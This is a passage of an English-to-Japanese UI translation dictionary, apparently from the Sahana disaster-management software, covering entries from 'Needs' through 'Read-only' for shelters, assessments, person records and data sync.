'Needs': '要求',
'Negative Flow Isolation': '逆流の分離',
'Neighbourhood': '近隣',
'Neighbouring building hazard': '隣接ビルが危険な状態',
'Neonatal ICU': '新生児ICU',
'Neonatology': '新生児科',
'Network': 'ネットワーク',
'Neurology': '神経科',
'New Assessment reported from': '新規アセスメントの報告元',
'New Checklist': '新規チェックリスト',
'New Peer': '新しいデータ同期先',
'New Record': '新規レコード',
'New Report': '新規レポート',
'New Request': '新規の支援要請',
'New Solution Choice': '新しい解決案を選択',
'New Support Request': '新しい支援要請',
'New Synchronization Peer': '新しい同期先',
'New cases in the past 24h': '過去24時間の新規ケース数',
'New': '新規',
'News': 'ニュース',
'Next View': '次を表示',
'Next': '次へ',
'No Activities Found': '支援活動が見つかりませんでした',
'No Addresses currently registered': '住所は、まだ登録がありません。',
'No Aid Requests have been made yet': '援助要請がまだ作成されていません',
'No Alternative Items currently registered': '代替物資は現在登録されていません',
'No Assessment Summaries currently registered': 'アセスメントの要約が登録されていません',
'No Assessments currently registered': '登録済みのアセスメントがありません',
'No Asset Assignments currently registered': '現在のところ資産割り当ては登録されていません',
'No Assets currently registered': '登録されている資産は現在ありません。',
'No Baseline Types currently registered': '登録済みのBaseline Typesはありません',
'No Baselines currently registered': '登録されている基準値はありません',
'No Brands currently registered': '登録されている銘柄がありません',
'No Budgets currently registered': '予算は、まだ登録がありません。',
'No Bundles currently registered': 'Bundleは、まだ登録がありません。',
'No Catalog Items currently registered': '登録済みのカタログアイテムがありません',
'No Category<>Sub-Category<>Catalog Relation currently registered': 'Category<>Sub-Category<>Catalog間の関係は、まだ登録がありません。',
'No Checklist available': '利用可能なチェックリストがありません',
'No Cluster Subsectors currently registered': 'クラスタのサブセクタはまだ登録がありません',
'No Clusters currently registered': '登録済みのクラスタはありません',
'No Commitment Items currently registered': '現在のところコミット済み物資は登録されていません',
'No Commitments': 'コミットメントがありません',
'No Configs currently defined': '設定は、まだ定義されていません',
'No Credentials currently set': '現在のところ証明書が設定されていません',
'No Details currently registered': '詳細は、まだ登録されていません',
'No Distribution Items currently registered': '配給物資の登録がありません',
'No Distributions currently registered': '配給所の登録がありません',
'No Documents found': '文書が見つかりませんでした。',
'No Donors currently registered': '資金提供組織はまだ登録されていません',
'No Feature Layers currently defined': 'Feature Layersはまだ定義されていません',
'No Flood Reports currently registered': '登録済みの洪水情報はありません',
'No GPX Layers currently defined': 'GPXレイヤはまだ定義されていません',
'No Groups currently defined': 'グループはまだ定義されていません',
'No Groups currently registered': 'グループはまだ登録されていません',
'No Hospitals currently registered': '病院はまだ登録されていません',
'No Identification Report Available': '利用可能なIDレポートはありません',
'No Identities currently registered': '登録されているIDはありません',
'No Image': '画像なし',
'No Images currently registered': '画像の登録はありません',
'No Impact Types currently registered': '被害の種類は未登録です',
'No Impacts currently registered': 'これまでに登録されたImpactはありません',
'No Incident Reports currently registered': '登録されているインシデントレポートはありません',
'No Incidents currently registered': '登録済みのインシデントはありません。',
'No Incoming Shipments': '到着予定の輸送物資はありません',
'No Inventory Items currently registered': '備蓄物資の登録がありません',
'No Inventory Stores currently registered': '現在登録されている物資集積地点はありません',
'No Item Catalog Category currently registered': '救援物資カタログのカテゴリはまだ登録がありません',
'No Item Catalog currently registered': 'アイテムカタログはまだ登録されていません',
'No Item Categories currently registered': '救援物資カテゴリの登録がありません',
'No Item Packs currently registered': '救援物資のパックは、まだ登録がありません',
'No Item Sub-Category currently registered': '救援物資のサブカテゴリはまだ登録されていません',
'No Item currently registered': 'アイテムはまだ登録されていません',
'No Items currently registered': '物資はまだ登録されていません',
'No Items currently requested': '要求されている物資はありません',
'No Keys currently defined': 'Keyはまだ定義されていません',
'No Kits currently registered': 'Kitはまだ登録されていません',
'No Level 1 Assessments currently registered': '現在のところ、レベル1アセスメントは登録されていません',
'No Level 2 Assessments currently registered': '現在のところ、レベル2アセスメントは登録されていません',
'No Locations currently available': '現在利用可能なロケーションはありません',
'No Locations currently registered': 'ロケーションはまだ登録されていません',
'No Map Profiles currently defined': '地図の設定が定義されていません',
'No Markers currently available': '現在利用可能なマーカーはありません',
'No Match': '合致する結果がありません',
'No Matching Catalog Items': '適合する救援物資はありませんでした',
'No Matching Records': '適合する検索結果がありませんでした',
'No Members currently registered': 'メンバはまだ登録されていません',
'No Memberships currently defined': 'メンバシップはまだ登録されていません',
'No Messages currently in Outbox': '送信箱にメッセージがありません',
'No Metadata currently defined': 'メタデータはまだ定義されていません',
'No Need Types currently registered': '現在登録されている需要タイプはありません',
'No Needs currently registered': '現在要求は登録されていません',
'No Offices currently registered': 'オフィスはまだ登録されていません',
'No Offices found!': 'オフィスが見つかりませんでした',
'No Organizations currently registered': '団体はまだ登録されていません',
'No Packs for Item': 'この物資に対する救援物資パックはありません',
'No Peers currently registered': '登録済みのデータ同期先はありません',
'No People currently registered in this shelter': 'この避難所に登録されている人物情報はありません',
'No Persons currently registered': '人物情報はまだ登録されていません',
'No Persons currently reported missing': '現在、行方不明者の登録はありません',
'No Persons found': '該当する人物はいませんでした',
'No Photos found': '写真の登録がありません',
'No Picture': '写真がありません',
'No Presence Log Entries currently registered': '所在地履歴の登録がありません',
'No Problems currently defined': '定義済みの問題がありません',
'No Projections currently defined': '地図投影法は、まだ定義されていません。',
'No Projects currently registered': '定義済みのプロジェクトはありません',
'No Rapid Assessments currently registered': '被災地の現況アセスメントはまだ登録されていません',
'No Received Items currently registered': '受領された救援物資の登録はありません',
'No Received Shipments': '受け取った輸送はありません',
'No Records currently available': '利用可能なレコードはありません',
'No Records matching the query': '条件に当てはまるレコードが存在しません',
'No Request Items currently registered': '物資要請の登録がありません',
'No Requests have been made yet': '支援要請は、まだ行われていません',
'No Requests match this criteria': 'この条件に一致する支援要請はありません',
'No Requests': '支援要請がありません',
'No Responses currently registered': '現在登録されている回答はありません',
'No Rivers currently registered': '河川情報の登録がありません',
'No Roles currently defined': '役割はまだ定義されていません',
'No Sections currently registered': 'このセクションの登録情報がありません',
'No Sectors currently registered': '登録済みの活動分野がありません',
'No Sent Items currently registered': '送付した物資の登録がありません',
'No Sent Shipments': '送付が行われた輸送がありません',
'No Settings currently defined': '設定は、まだ定義されていません',
'No Shelter Services currently registered': '登録されている避難所サービスがありません',
'No Shelter Types currently registered': '登録済みの避難所タイプがありません',
'No Shelters currently registered': '避難所はまだ登録されていません',
'No Shipment Transit Logs currently registered': '物資輸送履歴の登録がありません',
'No Shipment/Way Bills currently registered': '輸送伝票/貨物運送状はまだ登録されていません',
'No Shipment<>Item Relation currently registered': '輸送とアイテムの関連付けはまだ登録されていません',
'No Sites currently registered': '登録されているサイトはありません',
'No Skill Types currently set': '設定済みのスキルタイプはありません',
'No Solutions currently defined': '解決案はまだ定義されていません',
'No Staff Types currently registered': 'スタッフタイプはまだ登録されていません',
'No Staff currently registered': 'スタッフはまだ登録されていません',
'No Storage Bin Type currently registered': '登録済みのStorage Binタイプがありません',
'No Storage Bins currently registered': 'Storage Binはまだ登録されていません',
'No Storage Locations currently registered': '登録されている備蓄地点がありません',
'No Subscription available': '寄付の申し込みがありません',
'No Support Requests currently registered': '現在のところ、支援要請は登録されていません',
'No Survey Answers currently registered': 'これまでに登録されたフィードバックの回答はありません',
'No Survey Questions currently registered': '登録済みのSurvey Questionsはありません',
'No Survey Sections currently registered': '登録済みのSurvey Sectionはありません',
'No Survey Series currently registered': '現在、調査報告は登録されていません',
'No Survey Template currently registered': '登録されている調査テンプレートがありません',
'No TMS Layers currently defined': 'TMS レイヤーがまだ定義されていません',
'No Tasks with Location Data': 'ロケーション情報を持っているタスクがありません',
'No Themes currently defined': 'テーマはまだ定義されていません',
'No Tickets currently registered': 'チケットはまだ定義されていません',
'No Tracks currently available': '利用可能な追跡情報はありません',
'No Units currently registered': '単位はまだ登録されていません',
'No Users currently registered': '登録済みのユーザがありません',
'No Volunteers currently registered': 'ボランティアの登録がありません',
'No Warehouse Items currently registered': '現在登録済みの倉庫物資はありません',
'No Warehouses currently registered': '倉庫が登録されていません',
'No Warehouses match this criteria': '条件に合致する倉庫がありません',
'No access at all': '完全に孤立中',
'No access to this record!': 'このレコードにはアクセスできません',
'No action recommended': 'アクション無しを推奨',
'No calculations made': '見積が作成されていません',
'No conflicts logged': 'コンフリクトのログはありません。',
'No contact information available': '利用可能な連絡先情報はありません',
'No contacts currently registered': '連絡先が登録されていません',
'No data in this table - cannot create PDF!': 'テーブルにデータがありません。PDF を作成できません。',
'No databases in this application': 'このアプリケーションにデータベースはありません',
'No dead body reports available': '遺体情報のレポートはありません',
'No entries found': 'エントリが見つかりません',
'No entries matching the query': 'クエリに一致するエントリはありませんでした。',
'No import jobs': 'インポートされたJobがありません',
'No linked records': 'リンクされているレコードはありません',
'No location known for this person': 'この人物の消息が不明です',
'No locations found for members of this team': 'このチームのメンバーの場所が見つかりませんでした',
'No locations registered at this level': 'この階層に登録されているロケーションはありません',
'No log entries matching the query': '検索に合致するログエントリがありません',
'No matching items for this request': 'この支援要請に適合する物資はありません',
'No matching records found.': '一致するレコードがありませんでした。',
'No messages in the system': 'システム上にメッセージが存在しません',
'No notes available': '追加情報はありません',
'No peers currently registered': '現在登録されているデータ同期先はありません',
'No pending registrations found': '処理保留中の登録申請はありません',
'No pending registrations matching the query': '検索に合致する処理保留登録申請がありません。',
'No person record found for current user.': '現在のユーザの人物情報レコードが見つかりませんでした。',
'No positions currently registered': '登録されているpositionがありません',
'No problem group defined yet': '定義済みの問題グループがありません。',
'No records matching the query': '条件に当てはまるレコードが存在しません',
'No records to delete': '削除するレコードがありません',
'No recovery reports available': '利用可能な遺体回収レポートはありません',
'No report available.': '利用可能なレポートはありません。',
'No reports available.': '利用可能なレポートがありません。',
'No reports currently available': '利用可能なレポートはありません',
'No requests found': '支援要請は見つかりませんでした',
'No resources currently registered': 'リソースはまだ登録されていません',
'No resources currently reported': 'レポート済みのリソースはありません',
'No service profile available': '利用可能なサービスプロファイルはありません',
'No skills currently set': 'スキルが登録されていません',
'No status information available': '状況に関する情報はありません',
'No synchronization': '同期なし',
'No tasks currently registered': 'タスクはまだ登録されていません',
'No template found!': 'テンプレートが見つかりません。',
'No units currently registered': '単位はまだ登録されていません',
'No volunteer information registered': 'ボランティア情報はまだ登録されていません',
'No': 'いいえ',
'Non-structural Hazards': '非構造的な危険',
'None (no such record)': 'なし(記録がありません)',
'None': 'なし',
'Noodles': '麺',
'Normal food sources disrupted': '普段の食料供給源が混乱している',
'Normal': '通常どおり',
'Not Applicable': '該当なし',
'Not Authorised!': '認証されていません',
'Not Possible': '対応不可',
'Not Set': '設定されていません',
'Not Authorized': '認証されていません',
'Not installed or incorrectly configured.': 'インストールされていないか、適切な設定がされていません',
'Not yet a Member of any Group': 'メンバシップはまだ登録されていません',
'Note Details': '追加情報の詳細',
'Note Status': '追加情報のステータス',
'Note Type': '追加情報の種類',
'Note added': '追加情報を追加しました',
'Note deleted': '追加情報を削除しました',
'Note that this list only shows active volunteers. To see all people registered in the system, do a search from the home screen instead': '注意:このリストは、活動中のボランティアのみ表示しています。システムに登録しているすべての人をみるには、ホーム・スクリーンから検索してください。',
'Note updated': '追加情報を更新しました',
'Note': '追加情報',
'Notes': '追加情報',
'Notice to Airmen': 'NOTAM (航空従事者用)',
'Number of Columns': '列数',
'Number of Patients': '患者数',
'Number of Rows': '行数',
'Number of Vehicles': '車両数',
'Number of additional beds of that type expected to become available in this unit within the next 24 hours.': 'この施設において、今後24時間以内に利用可能になると予測されている、このタイプの追加ベッド数。',
'Number of alternative places for studying': '授業用に確保できる場所の数',
'Number of available/vacant beds of that type in this unit at the time of reporting.': 'このタイプの利用可能/空きベッド数(報告時点)',
'Number of deaths during the past 24 hours.': '過去24時間以内の死亡者数',
'Number of discharged patients during the past 24 hours.': '退院患者数(過去24時間以内)',
'Number of doctors actively working': '現在活動中の医師の数',
'Number of doctors': '医者の人数',
'Number of houses damaged, but usable': '破損しているが利用可能な家屋の数',
'Number of houses destroyed/uninhabitable': '全壊/居住不可になった家屋数',
'Number of in-patients at the time of reporting.': 'レポート時の患者数です。',
'Number of latrines': 'トイレ総数',
'Number of midwives actively working': '現在活動中の助産師の数',
'Number of newly admitted patients during the past 24 hours.': '入院患者数(過去24時間以内)',
'Number of non-medical staff': '医療従事以外のスタッフ数',
'Number of nurses actively working': '現在活動中の看護師の数',
'Number of nurses': '看護師の人数',
'Number of private schools': '私立学校の数',
'Number of public schools': '公立学校の数',
'Number of religious schools': '宗教学校の数',
'Number of residential units not habitable': '住めなくなった住居の数',
'Number of residential units': '居住施設の数',
'Number of schools damaged but usable': '破損しているが利用可能な校舎の数',
'Number of schools destroyed/uninhabitable': '全壊 / 利用不可能な校舎の数',
'Number of schools open before disaster': '災害前に開校していた学校数',
'Number of schools open now': '現在開校している学校の数',
'Number of teachers affected by disaster': '被災した教師の数',
'Number of teachers before disaster': '災害発生前の教師の数',
'Number of vacant/available beds in this hospital. Automatically updated from daily reports.': '病院に設置されている、現在利用可能なベッドの数。日時レポートにより、自動的に更新されます。',
'Number of vacant/available units to which victims can be transported immediately.': '現在利用可能なユニット数。犠牲者を即座に安置できる数。',
'Number or Label on the identification tag this person is wearing (if any).': 'この人物の衣服につけられているタグの番号、あるいはラベル名(ある場合のみ).',
'Number or code used to mark the place of find, e.g. flag code, grid coordinates, site reference number or similar (if available)': 'この場所をあとで検索するための番号かコード 例: フラグ番号、グリッドの位置、サイトの参照番号など',
'Number': '番号',
'Number/Percentage of affected population that is Female & Aged 0-5': '女性(0-5歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Female & Aged 13-17': '女性(13-17歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Female & Aged 18-25': '女性(18-25歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Female & Aged 26-60': '女性(26-60歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Female & Aged 6-12': '女性(6-12歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Female & Aged 61+': '女性(61歳以上)の被災者数 / 割合',
'Number/Percentage of affected population that is Male & Aged 0-5': '男性(0-5歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Male & Aged 13-17': '男性(13-17歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Male & Aged 18-25': '男性(18-25歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Male & Aged 26-60': '男性(26-60歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Male & Aged 6-12': '男性(6-12歳)の被災者数 / 割合',
'Number/Percentage of affected population that is Male & Aged 61+': '男性(61歳以上)の被災者数 / 割合',
'Numbers Only': '数値のみ',
'Nursery Beds': '新生児用ベッド',
'Nutrition problems': '栄養問題',
'Nutrition': '食料・栄養',
'OR Reason': '手術室の詳細',
'OR Status Reason': '手術室の状態理由',
'OR Status': '手術室の状態',
'Observer': 'オブザーバ',
'Obsolete': '廃止済み',
'Obstetrics/Gynecology': '産婦人科',
'Office Address': 'オフィスの住所',
'Office Details': 'オフィスの詳細',
'Office added': 'オフィスを追加しました',
'Office deleted': 'オフィスを削除しました',
'Office updated': 'オフィスを更新しました',
'Office': 'オフィス',
'Offices': 'オフィス',
'Offline Sync (from USB/File Backup)': 'データのオフライン同期(USB/バックアップファイル利用)',
'Offline Sync': 'データのオフライン同期',
'Old': '古い',
'Older people as primary caregivers of children': '子供の介護を、高齢者が担当',
'Older people in care homes': '介護施設で生活する高齢者がいる',
'Older people participating in coping activities': '高齢者が災害対応に従事',
'Older people with chronical illnesses': '慢性疾患をもつ高齢者がいる',
'Older person (>60 yrs)': '高齢者(60歳以上)',
'On by default? (only applicable to Overlays)': 'デフォルトでオン(オーバーレイにのみ有効)',
'On by default?': 'デフォルトでON?',
'One Time Cost': '1回毎の費用',
'One time cost': '一回毎の費用',
'One-time costs': '一回毎の費用',
'One-time': '1回毎',
'Oops! Something went wrong...': '申し訳ありません、何か問題が発生しています。',
'Oops! something went wrong on our side.': '申し訳ありません、システム側に問題が発生しています。',
'Opacity (1 for opaque, 0 for fully-transparent)': '不透明度(1は不透明、0は完全に透明)',
'Open Assessment': '未解決のアセスメント',
'Open Map': '地図を開く',
'Open area': '空き地',
'Open recent': '最近使用したものを開く',
'Open': '開く',
'OpenStreetMap Editor': 'OpenStreetMap エディタ',
'Operating Rooms': '手術室',
'Optional link to an Incident which this Assessment was triggered by.': 'このアセスメントの端緒となった事故へのオプション・リンク',
'Optional': '任意',
'Optional. In GeoServer, this is the Workspace Namespace URI. Within the WFS getCapabilities, this is the FeatureType Name part before the colon(:).': 'オプション。GeoServerでは、ワークスペース名前空間のURIです。WFS getCapabilitiesでは、FeatureType名のコロンの前の部分です。',
'Options': 'オプション',
'Organization Details': '団体の詳細',
'Organization Registry': '団体情報の登録',
'Organization added': '団体を追加しました',
'Organization deleted': '団体を削除しました',
'Organization updated': '団体を更新しました',
'Organization': '団体',
'Organizations': '団体',
'Origin of the separated children': '離別した子供たちの出身地',
'Origin': '出身地',
'Other (describe)': 'その他 (要記述)',
'Other (specify)': 'その他(具体的に)',
'Other Evidence': 'その他の証跡',
'Other Faucet/Piped Water': 'その他 蛇口/パイプによる水源',
'Other Isolation': 'その他の孤立',
'Other Name': 'その他の名前',
'Other activities of boys 13-17yrs before disaster': 'その他、災害発生前の13-17歳男子の活動状況',
'Other activities of boys 13-17yrs': 'その他、13-17歳男子の活動状況',
'Other activities of boys <12yrs before disaster': 'その他、災害発生前の12歳以下男子の活動状況',
'Other activities of boys <12yrs': 'その他、12歳以下男子の活動状況',
'Other activities of girls 13-17yrs before disaster': 'その他、災害発生前の13-17歳女子の活動状況',
'Other activities of girls 13-17yrs': 'その他、13-17歳女子の活動状況',
'Other activities of girls<12yrs before disaster': 'その他、災害発生前の12歳以下女子の活動状況',
'Other activities of girls<12yrs': 'その他、12歳以下女子の活動状況',
'Other alternative infant nutrition in use': 'その他、使用されている乳児用代替食',
'Other alternative places for study': 'その他、授業開設に利用可能な施設',
'Other assistance needed': 'その他に必要な援助活動',
'Other assistance, Rank': 'その他の援助、ランク',
'Other current health problems, adults': 'その他の健康問題(成人)',
'Other current health problems, children': 'その他の健康問題(小児)',
'Other events': '他のイベント',
'Other factors affecting school attendance': 'その他、生徒の就学に影響する要因',
'Other major expenses': 'その他の主な支出',
'Other non-food items': '食料以外の救援物資',
'Other recommendations': '他の推薦',
'Other residential': '住宅その他',
'Other school assistance received': 'その他の学校用品を受領した',
'Other school assistance, details': '受領した学校用品の内訳',
'Other school assistance, source': 'その他の学校用品の送付元',
'Other side dishes in stock': '在庫のあるその他食材',
'Other types of water storage containers': 'それ以外の水貯蔵容器タイプ',
'Other ways to obtain food': 'それ以外の食料調達方法',
'Other': 'その他',
'Outbound Mail settings are configured in models/000_config.py.': '送信メール設定は、models/000_config.py で定義されています。',
'Outbox': '送信箱',
'Outgoing SMS Handler': 'SMS 送信ハンドラ',
'Outgoing SMS handler': 'SMS送信ハンドラ',
'Overall Hazards': 'すべての危険',
'Overhead falling hazard': '頭上落下物の危険',
'Overland Flow Flood': '地表流による洪水',
'Overlays': 'オーバーレイ',
'Owned Records': '自身のレコード',
'Owned Resources': '保持しているリソース',
'PDAM': '水道会社(PDAM)',
'PIN number ': 'PIN 番号',
'PIN': '暗証番号',
'PL Women': 'PL 女性',
'Pack': 'パック',
'Packs': 'パック',
'Pan Map: keep the left mouse button pressed and drag the map': 'マップをパン: マウスの左ボタンを押したまま、地図をドラッグしてください',
'Parameters': 'パラメータ',
'Parapets, ornamentation': '欄干、オーナメント',
'Parent Office': '親組織のオフィス',
'Parent needs to be of the correct level': '適切なレベルの親属性を指定してください',
'Parent needs to be set for locations of level': 'ロケーションのレベルには親属性が必要です',
'Parent needs to be set': '親情報が設定される必要があります',
'Parent': '親',
'Parents/Caregivers missing children': '親/介護者とはぐれた子供たち',
'Partial': '一部 / 不足',
'Participant': '参加者',
'Pashto': 'パシュトー語',
'Passport': 'パスポート',
'Password for authentication at the peer. Note that only HTTP Basic authentication is supported.': '同期先での認証に使用するパスワードです。HTTPベーシック認証のみサポートしています。',
'Password': 'パスワード',
'Path': 'パス',
'Pathology': '病理学',
'Patients': '患者数',
'Pediatric ICU': '小児ICU',
'Pediatric Psychiatric': '小児精神科',
'Pediatrics': '小児科',
'Peer Details': 'データ同期先の詳細',
'Peer Registration Details': 'データ同期先登録の詳細',
'Peer Registration Request': 'データ同期先の登録要求',
'Peer Registration': 'データ同期先登録',
'Peer Type': '同期先タイプ',
'Peer UID': '同期先UID',
'Peer added': 'データ同期先を追加しました',
'Peer deleted': 'データ同期先を削除しました',
'Peer not allowed to push': '同期先がデータのプッシュを許可していません',
'Peer registration request added': 'データ同期先の登録要求を追加しました',
'Peer registration request deleted': 'データ同期先の登録要求を削除しました',
'Peer registration request updated': 'データ同期先の登録要求を更新しました',
'Peer updated': '同期先を更新しました',
'Peer': 'データ同期先',
'Peers': '同期先',
'Pending Requests': '保留中の支援要請',
'Pending': '中断',
'People Needing Food': '食料不足',
'People Needing Shelter': '避難所が必要',
'People Needing Water': '水が必要',
'People Trapped': '救難者',
'People with chronical illnesses': '慢性疾患をもつ成人がいる',
'People': '人物情報',
'Person 1': '人物 1',
'Person 1, Person 2 are the potentially duplicate records': '人物情報1と人物情報2は重複したレコードの可能性があります。',
'Person 2': '人物 2',
'Person Data': '人物データ',
'Person De-duplicator': '人物情報の重複削除',
'Person Details': '人物情報の詳細',
'Person Finder': '消息情報',
'Person Registry': '人物情報の登録',
'Person added to Group': 'グループメンバを追加しました',
'Person added to Team': 'グループメンバを追加しました',
'Person added': '人物情報を追加しました',
'Person deleted': '人物情報を削除しました',
'Person details updated': '人物情報を更新しました',
'Person interviewed': 'インタビュー担当者',
'Person missing': '行方不明中',
'Person must be specified!': '登録がありません',
'Person reporting': 'レポート報告者',
'Person who has actually seen the person/group.': '人物/グループで実際に目撃された人物情報',
'Person who is reporting about the presence.': 'この所在報告を行った人物です。',
'Person who observed the presence (if different from reporter).': '人物の所在を確認したひとの情報(報告者と異なる場合のみ記入)。',
'Person': '人物情報',
'Person/Group': '人物/グループ',
'Personal Data': '個人情報',
'Personal Effects Details': '個人の影響の詳細',
'Personal Effects': '所持品',
'Personal impact of disaster': 'この人物の被災状況',
'Personal': '個人',
'Persons in institutions': '施設居住中の住人',
'Persons with disability (mental)': '障がい者数(精神的障がい者を含む)',
'Persons with disability (physical)': '肉体的な障がい者の数',
'Persons': '人物情報',
'Phone 1': '電話番号',
'Phone 2': '電話番号(予備)',
'Phone': '電話番号',
'Phone/Business': '電話番号/仕事',
'Phone/Emergency': '電話番号/緊急連絡先',
'Phone/Exchange': '電話/とりつぎ',
'Photo Details': '写真の詳細',
'Photo Taken?': '写真撮影済み?',
'Photo added': '写真を追加しました',
'Photo deleted': '写真を削除しました',
'Photo updated': '写真を更新しました',
'Photo': '写真',
'Photograph': '写真',
'Photos': '写真',
'Physical Description': '身体外見の説明',
'Physical Safety': '身体的安全',
'Picture upload and finger print upload facility': '指紋や写真のアップロード機能',
'Picture': '写真',
'Place for solid waste disposal': '廃棄物の処理を行う場所を記載してください',
'Place of Recovery': '遺体回収場所',
'Place on Map': '地図上の場所',
'Places for defecation': 'トイレ',
'Places the children have been sent to': '子供たちの避難先',
'Planner': '立案者',
'Playing': '家庭内/外で遊ぶ',
'Please correct all errors.': 'すべてのエラーを修正してください。',
'Please enter a First Name': '苗字を入力してください',
'Please enter a valid email address': '有効な電子メールアドレスを入力してください。',
'Please enter the first few letters of the Person/Group for the autocomplete.': '自動入力するには人物あるいはグループの最初の数文字を入力してください',
'Please enter the recipient': '受取担当者を入力してください',
'Please fill this!': 'ここに入力してください',
'Please provide the URL of the page you are referring to, a description of what you expected to happen & what actually happened. If a ticket was issued then please provide the Ticket ID.': '言及先のURLを明示し、期待する結果と実際に発生した結果を記述してください。不具合チケットが発行された場合は、そのチケットIDも記載してください。',
'Please report here where you are:': 'いまあなたが居る場所を入力してください。',
'Please select another level': '別のレベルを選択してください',
'Please select': '選んでください',
'Please sign-up with your Cell Phone as this allows us to send you Text messages. Please include full Area code.': '携帯電話番号でサインアップし、Sahanaからのテキストメッセージを受け取れるようにします。国際電話コードまで含めた形式で入力してください',
'Please specify any problems and obstacles with the proper handling of the disease, in detail (in numbers, where appropriate). You may also add suggestions the situation could be improved.': '病気の治療に当たって問題となる事象の詳細を記載します。状況を改善するための提案も、もしあれば記載してください。',
'Please use this field to record any additional information, including a history of the record if it is updated.': '追加情報はこの項目に記載してください。レコードの変更履歴などにも利用可能です。',
'Please use this field to record any additional information, including any Special Needs.': '特別な要求など、どんな追加情報でも構いませんので、この部分に記録してください',
'Please use this field to record any additional information, such as Ushahidi instance IDs. Include a history of the record if it is updated.': 'UshahidiのインスタンスIDなど、追加情報がある場合はこの項目に記載してください。レコードの変更履歴などにも利用可能です。',
'Pledge Aid to match these Requests': 'これらの要求に一致する支援に寄付する',
'Pledge Aid': '寄付する',
'Pledge Status': '寄付のステータス',
'Pledge Support': '寄付サポート',
'Pledge': '寄付',
'Pledged': '寄付済み',
'Pledges': '寄付',
'Point': 'ポイント',
'Poisoning': '中毒',
'Poisonous Gas': '有毒ガス',
'Police': '警察',
'Pollution and other environmental': '汚染、あるいはその他の環境要因',
'Polygon reference of the rating unit': 'その評価単位への参照ポリゴン',
'Polygon': 'ポリゴン',
'Population and number of households': '人口と世帯数',
'Population': '利用者数',
'Porridge': 'おかゆ',
'Port Closure': '港湾閉鎖',
'Port': 'ポート',
'Position Details': 'ポジションの詳細',
'Position added': 'Position を追加しました',
'Position deleted': 'ポジションを削除しました',
'Position type': '場所のタイプ',
'Position updated': 'ポジションを更新しました',
'Positions': 'ポジション',
'Postcode': '郵便番号',
'Poultry restocking, Rank': '家禽の補充、ランク',
'Poultry': '家禽(ニワトリ)',
'Pounds': 'ポンド',
'Power Failure': '停電',
'Pre-cast connections': 'プレキャスト連結',
'Preferred Name': '呼び名',
'Pregnant women': '妊婦の数',
'Preliminary': '予備',
'Presence Condition': '所在情報',
'Presence Log': '所在履歴',
'Presence': '所在',
'Previous View': '前を表示',
'Previous': '前へ',
'Primary Name': '基本名',
'Primary Occupancy': '主な用途',
'Priority Level': '優先度レベル',
'Priority': '優先度',
'Private': '企業',
'Problem Administration': '問題管理',
'Problem Details': '問題の詳細',
'Problem Group': '問題グループ',
'Problem Title': '問題の名称',
'Problem added': '問題を追加しました',
'Problem connecting to twitter.com - please refresh': 'twitter.comに接続できません。更新ボタンを押してください',
'Problem deleted': '問題を削除しました',
'Problem updated': '問題を更新しました',
'Problem': '問題',
'Problems': '問題',
'Procedure': '手続き',
'Procurements': '物資の調達',
'Product Description': '製品の説明',
'Product Name': '製品名',
'Profile': 'プロファイル',
'Project Activities': 'プロジェクト活動状況',
'Project Details': 'プロジェクトの詳細',
'Project Management': 'プロジェクト管理',
'Project Status': 'プロジェクトのステータス',
'Project Tracking': 'プロジェクト追跡',
'Project added': 'プロジェクトを追加しました',
'Project deleted': 'プロジェクトを削除しました',
'Project has no Lat/Lon': 'プロジェクトの緯度/経度情報はありません',
'Project updated': 'プロジェクトを更新しました',
'Project': 'プロジェクト',
'Projection Details': '地図投影法の詳細',
'Projection added': '地図投影法を追加しました',
'Projection deleted': '地図投影法を削除しました',
'Projection updated': '地図投影法を更新しました',
'Projection': '地図投影法',
'Projections': '地図投影法',
'Projects': 'プロジェクト',
'Property reference in the council system': '評議システムで使用されるプロパティリファレンス',
'Protected resource': '保護されたリソース',
'Protection': '被災者保護',
'Provide Metadata for your media files': 'メディアファイルにメタデータを提供',
'Provide a password': 'パスワードを入力',
'Provide an optional sketch of the entire building or damage points. Indicate damage points.': '建物全体か損傷箇所のスケッチを提供し、損傷箇所を明示してください。',
'Province': '都道府県',
'Proxy-server': 'プロキシサーバ',
'Psychiatrics/Adult': '精神科/成人',
'Psychiatrics/Pediatric': '精神科/小児',
'Public Event': '公開イベント',
'Public and private transportation': '公共および民営の交通機関',
'Public assembly': '公会堂',
'Public': '公開',
'Pull tickets from external feed': '外部フィードからのticketの取得',
'Punjabi': 'パンジャブ',
'Push tickets to external system': '外部システムにチケットの発信',
'Put a choice in the box': '箱の中から選んで取る',
'Pyroclastic Flow': '火砕流',
'Pyroclastic Surge': '火砕サージ',
'Python Serial module not available within the running Python - this needs installing to activate the Modem': 'PythonでPython Serial moduleが利用できません。モデムの有効化に必要です。',
'Python needs the ReportLab module installed for PDF export': '実行中のPythonでReportLabモジュールが利用できません。PDF出力に必要です。',
'Quantity Committed': '引き受けた量',
'Quantity Fulfilled': '充足済みの数量',
'Quantity in Transit': '運送中の数量',
'Quantity': '数量',
'Quarantine': '隔離施設',
'Queries': 'クエリ',
'Query Feature': '問合せ機能',
'Query': 'クエリ',
'Queryable?': '検索可能?',
'RC frame with masonry infill': '鉄筋コンクリート造(組積造充填壁)',
'RECORD A': 'レコード A',
'RECORD B': 'レコード B',
'RESPONSE': '対応',
'Race': '人種',
'Radiological Hazard': '放射能災害',
'Radiology': '放射線科',
'Railway Accident': '鉄道事故',
'Railway Hijacking': '鉄道ハイジャック',
'Rain Fall': '降雨',
'Rapid Assessment Details': '被災地の現況アセスメントの詳細',
'Rapid Assessment added': '被災地の現況アセスメントを追加しました',
'Rapid Assessment deleted': '被災地の現況アセスメントを削除しました',
'Rapid Assessment updated': '被災地の現況アセスメントを更新しました',
'Rapid Assessment': '被災地の現況アセスメント',
'Rapid Assessments & Flexible Impact Assessments': '被災地の現況アセスメントと、災害影響範囲アセスメント',
'Rapid Assessments': '被災地の現況アセスメント',
'Rapid Close Lead': '急いで閉め、先導してください。',
'Rapid Data Entry': 'データ入力簡易版',
'Rating Scale': '評価尺度',
'Raw Database access': 'データベースへの直接アクセス',
'Read-Only': '読み込み専用',
'Read-only': '登録内容の編集を禁止',
